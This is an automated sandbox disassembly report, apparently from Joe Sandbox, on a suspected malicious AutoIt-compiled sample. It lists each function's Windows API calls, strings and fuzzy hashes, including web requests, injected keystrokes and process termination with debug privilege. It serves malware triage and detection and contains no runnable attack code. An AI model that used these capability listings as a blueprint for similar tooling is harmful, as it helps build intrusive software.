                          • API String ID: 469580280-3243417748
                          • Opcode ID: 553f37cfab43a9dc4ff06372d326eda460264161ecf85458991b1758de180fd7
                          • Instruction ID: f225435ddba99d44023a49359209108f4b5b64642c4f2af3381738137a175030
                          • Opcode Fuzzy Hash: 553f37cfab43a9dc4ff06372d326eda460264161ecf85458991b1758de180fd7
                          • Instruction Fuzzy Hash: B2D18031701212CFCB19DF14C899A29F7A0BF05710F9542ADF54AAB2A2DB39AD23CF55
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00705C7A
                            • Part of subcall function 00705D0A: GetClientRect.USER32(?,?), ref: 00705D30
                            • Part of subcall function 00705D0A: GetWindowRect.USER32(?,?), ref: 00705D71
                            • Part of subcall function 00705D0A: ScreenToClient.USER32(?,?), ref: 00705D99
                          • GetDC.USER32 ref: 007446F5
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00744708
                          • SelectObject.GDI32(00000000,00000000), ref: 00744716
                          • SelectObject.GDI32(00000000,00000000), ref: 0074472B
                          • ReleaseDC.USER32(?,00000000), ref: 00744733
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007447C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 01ced1be421c417efe3bf49b2e4490d4aa30492b99a50b5dc3982c444ee6c55d
                          • Instruction ID: 1a3a3360f3b5458a92acf78aa15df67251ca1925075cea4115a6e8ffc0e90ff2
                          • Opcode Fuzzy Hash: 01ced1be421c417efe3bf49b2e4490d4aa30492b99a50b5dc3982c444ee6c55d
                          • Instruction Fuzzy Hash: DD710331500205EFDF22CF64C984BBA7BB5FF4A360F14426AED555A1A6C7399C42EF60
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-2391861430
                          • Opcode ID: 943bd6ede070ebb765a73c95dfde27c6226cb18376d12cd1e48965aa75394f6f
                          • Instruction ID: fb9cee9bd097e718651a352fa0db8eea7f07ed09ca152bf12c02ff13458ae9c8
                          • Opcode Fuzzy Hash: 943bd6ede070ebb765a73c95dfde27c6226cb18376d12cd1e48965aa75394f6f
                          • Instruction Fuzzy Hash: 66516471900209FBDF15EBA0DC86EEEBB78AF04340F548225F60572192DB395B99DFA0
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C29A
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C2CA
                          • GetLastError.KERNEL32 ref: 0077C322
                          • SetEvent.KERNEL32(?), ref: 0077C336
                          • InternetCloseHandle.WININET(00000000), ref: 0077C341
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3113390036-3916222277
                          • Opcode ID: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
                          • Instruction ID: 86e84460bb798a8c5b84877324a6fad6dddbb079dd7092f0450bfb450244f267
                          • Opcode Fuzzy Hash: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
                          • Instruction Fuzzy Hash: 50317FB1500604AFDF229FA48C88AAB7BFCFB49784F14C51EF44AD2201DB38DD059B65
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00743AAF,?,?,Bad directive syntax error,0079CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007698BC
                          • LoadStringW.USER32(00000000,?,00743AAF,?), ref: 007698C3
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00769987
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString_wcslen
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 858772685-4153970271
                          • Opcode ID: f76431c3245770f24bf860a1ab1a9986a5f7c55ce6f5a323f8c4b5f66621c547
                          • Instruction ID: a6706b96b3e10546827e5a147f60ec1f150f605ad921ed31f0ef8f01900f682b
                          • Opcode Fuzzy Hash: f76431c3245770f24bf860a1ab1a9986a5f7c55ce6f5a323f8c4b5f66621c547
                          • Instruction Fuzzy Hash: B4218071C0025AEBDF15EF90CC4AEEE7779BF18300F04445AF619620E2EB39A658DB20
                          APIs
                          • GetParent.USER32 ref: 007620AB
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 007620C0
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0076214D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1290815626-3381328864
                          • Opcode ID: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
                          • Instruction ID: 8c7bab936c5e04ae6ab28f019023c00c0d0482e5019e22da7c1779127b7729e0
                          • Opcode Fuzzy Hash: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
                          • Instruction Fuzzy Hash: 7D113DF628CB0AF6FA056624EC0ADA6379CCB05314B20401AFF05B40D2FE6D6C435514
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                          • String ID:
                          • API String ID: 1282221369-0
                          • Opcode ID: b43e0867dd5a04f962838faf4ca12871b7bb29490e693af1d880e8f4c42ecf60
                          • Instruction ID: 1b83e8fd75c208b727fe098ea767d470715c80e15d9b8c2f163682fc37e65928
                          • Opcode Fuzzy Hash: b43e0867dd5a04f962838faf4ca12871b7bb29490e693af1d880e8f4c42ecf60
                          • Instruction Fuzzy Hash: 37612772A05316AFFB26AFB4A889B697BA5EF05310F14416EF940B7243D73E9D01C790
                          APIs
                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00756890
                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007568A9
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007568B9
                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007568D1
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007568F2
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00718874,00000000,00000000,00000000,000000FF,00000000), ref: 00756901
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0075691E
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00718874,00000000,00000000,00000000,000000FF,00000000), ref: 0075692D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                          • String ID:
                          • API String ID: 1268354404-0
                          • Opcode ID: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
                          • Instruction ID: bd9dbc32156defdf02772f9f28c06e4ba1bdd16fd50348c75a14a9c8ab4e3ff5
                          • Opcode Fuzzy Hash: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
                          • Instruction Fuzzy Hash: 37518BB0600209EFDB20CF28CC55BAA7BB5FF54751F144519F906972E0DBB8E991DB50
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C182
                          • GetLastError.KERNEL32 ref: 0077C195
                          • SetEvent.KERNEL32(?), ref: 0077C1A9
                            • Part of subcall function 0077C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
                            • Part of subcall function 0077C253: GetLastError.KERNEL32 ref: 0077C322
                            • Part of subcall function 0077C253: SetEvent.KERNEL32(?), ref: 0077C336
                            • Part of subcall function 0077C253: InternetCloseHandle.WININET(00000000), ref: 0077C341
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 337547030-0
                          • Opcode ID: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
                          • Instruction ID: 0dcbd8bd46c2b5aea8c664b01dedfe2efd1d171a3491c4a91affbfdc577ac6f2
                          • Opcode Fuzzy Hash: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
                          • Instruction Fuzzy Hash: 3B318B71200605EFDF229FA5DC48A66BBF8FF1C380B54C42EF95A86611D738E9159BA0
                          APIs
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007625BD
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007625DB
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007625DF
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007625E9
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00762601
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00762605
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0076260F
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00762623
                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00762627
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
                          • Instruction ID: 72ace2a315746c4db0fc055b21e850490b482fd1d1578699c1ee325205ae23fb
                          • Opcode Fuzzy Hash: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
                          • Instruction Fuzzy Hash: FB012430380614BBFB206768CC8EF593F59DF4EB12F104002F319AE1D1C9EA2842CA6E
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00761449,?,?,00000000), ref: 0076180C
                          • HeapAlloc.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 00761813
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761828
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00761449,?,?,00000000), ref: 00761830
                          • DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 00761833
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761843
                          • GetCurrentProcess.KERNEL32(00761449,00000000,?,00761449,?,?,00000000), ref: 0076184B
                          • DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 0076184E
                          • CreateThread.KERNEL32(00000000,00000000,00761874,00000000,00000000,00000000), ref: 00761868
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          APIs
                            • Part of subcall function 0076D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
                            • Part of subcall function 0076D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
                            • Part of subcall function 0076D4DC: CloseHandle.KERNEL32(00000000), ref: 0076D5DC
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A16D
                          • GetLastError.KERNEL32 ref: 0078A180
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A1B3
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0078A268
                          • GetLastError.KERNEL32(00000000), ref: 0078A273
                          • CloseHandle.KERNEL32(00000000), ref: 0078A2C4
                          Strings
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00793925
                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0079393A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00793954
                          • _wcslen.LIBCMT ref: 00793999
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 007939C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007939F4
                          Strings
                          Similarity
                          • API ID: MessageSend$Window_wcslen
                          • String ID: SysListView32
                          • API String ID: 2147712094-78025650
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0076BCFD
                          • IsMenu.USER32(00000000), ref: 0076BD1D
                          • CreatePopupMenu.USER32 ref: 0076BD53
                          • GetMenuItemCount.USER32(01916C88), ref: 0076BDA4
                          • InsertMenuItemW.USER32(01916C88,?,00000001,00000030), ref: 0076BDCC
                          Strings
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                          • String ID: 0$2
                          • API String ID: 93392585-3793063076
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00722D4B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00722D53
                          • _ValidateLocalCookies.LIBCMT ref: 00722DE1
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00722E0C
                          • _ValidateLocalCookies.LIBCMT ref: 00722E61
                          Strings
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: &Hr$csm
                          • API String ID: 1170836740-2624131954
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 0076C913
                          Strings
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          APIs
                          Similarity
                          • API ID: _wcslen$LocalTime
                          • String ID:
                          • API String ID: 952045576-0
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0071F953
                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F3D1
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F454
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00792D1B
                          • GetDC.USER32(00000000), ref: 00792D23
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00792D2E
                          • ReleaseDC.USER32(00000000,00000000), ref: 00792D3A
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00792D76
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00792D87
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00795A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00792DC2
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00792DE1
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          APIs
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          APIs
                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007415CE
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741651
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007417FB,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416E4
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416FB
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741777
                          • __freea.LIBCMT ref: 007417A2
                          • __freea.LIBCMT ref: 007417AE
                          Similarity
                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 2829977744-0
                          APIs
                          Strings
                          Similarity
                          • API ID: Variant$ClearInit
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2610073882-625585964
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0077125C
                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00771284
                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007712A8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007712D8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0077135F
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007713C4
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00771430
                          Similarity
                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                          • String ID:
                          • API String ID: 2550207440-0
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0078396B
                          • CharUpperBuffW.USER32(?,?), ref: 00783A7A
                          • _wcslen.LIBCMT ref: 00783A8A
                          • VariantClear.OLEAUT32(?), ref: 00783C1F
                            • Part of subcall function 00770CDF: VariantInit.OLEAUT32(00000000), ref: 00770D1F
                            • Part of subcall function 00770CDF: VariantCopy.OLEAUT32(?,?), ref: 00770D28
                            • Part of subcall function 00770CDF: VariantClear.OLEAUT32(?), ref: 00770D34
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4137639002-1221869570
                          • Opcode ID: 76bc079fdb120d813a02c576a933949c81759acc94e3c1873fcbd9e18694c4b5
                          • Instruction ID: 3d67220ff4e0e3f63282623901eaf05152ae29c8cc574039fb1d4eb5d663af5b
                          • Opcode Fuzzy Hash: 76bc079fdb120d813a02c576a933949c81759acc94e3c1873fcbd9e18694c4b5
                          • Instruction Fuzzy Hash: 02913875608305DFCB04EF28C48596ABBE4BF88714F14892DF88997391DB39EE45CB92
                          APIs
                            • Part of subcall function 0076000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?,?,0076035E), ref: 0076002B
                            • Part of subcall function 0076000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760046
                            • Part of subcall function 0076000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
                            • Part of subcall function 0076000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?), ref: 00760064
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00784C51
                          • _wcslen.LIBCMT ref: 00784D59
                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00784DCF
                          • CoTaskMemFree.OLE32(?), ref: 00784DDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 614568839-2785691316
                          • Opcode ID: 7aa1165678ecc16e13d6f0bea89fa5a2a6c96702d47229824835f80e6e17eb08
                          • Instruction ID: 6f7b19eac0b6b5fb17e2374ac4fa77d202f97e02c2f9f6ef3f70e982cc288637
                          • Opcode Fuzzy Hash: 7aa1165678ecc16e13d6f0bea89fa5a2a6c96702d47229824835f80e6e17eb08
                          • Instruction Fuzzy Hash: 75912A71D00219EFDF11EFA4D894AEEB7B8BF08310F108269E915A7281DB785A45CF60
                          APIs
                          • GetMenu.USER32(?), ref: 00792183
                          • GetMenuItemCount.USER32(00000000), ref: 007921B5
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007921DD
                          • _wcslen.LIBCMT ref: 00792213
                          • GetMenuItemID.USER32(?,?), ref: 0079224D
                          • GetSubMenu.USER32(?,?), ref: 0079225B
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
